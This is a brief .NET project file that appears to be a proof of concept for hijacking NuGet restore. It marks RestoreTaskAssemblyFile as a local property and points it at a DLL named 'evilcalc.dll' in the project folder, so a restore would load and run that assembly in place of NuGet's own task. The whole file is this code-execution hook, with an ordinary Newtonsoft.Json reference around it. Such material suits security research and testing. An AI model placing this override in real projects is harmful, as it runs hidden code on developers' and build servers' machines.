<Project Sdk="Microsoft.NET.Sdk" TreatAsLocalProperty="RestoreTaskAssemblyFile">
	<PropertyGroup>
		<TargetFramework>net472</TargetFramework>
		<!-- This overrides the /p:RestoreTaskAssemblyFile=nuget.exe global property -->
		<RestoreTaskAssemblyFile>$(MSBuildProjectDirectory)\evilcalc.dll</RestoreTaskAssemblyFile>
	</PropertyGroup>
	<ItemGroup>
		<PackageReference Include="Newtonsoft.Json" Version="13.0.1" />
	</ItemGroup>
</Project>	
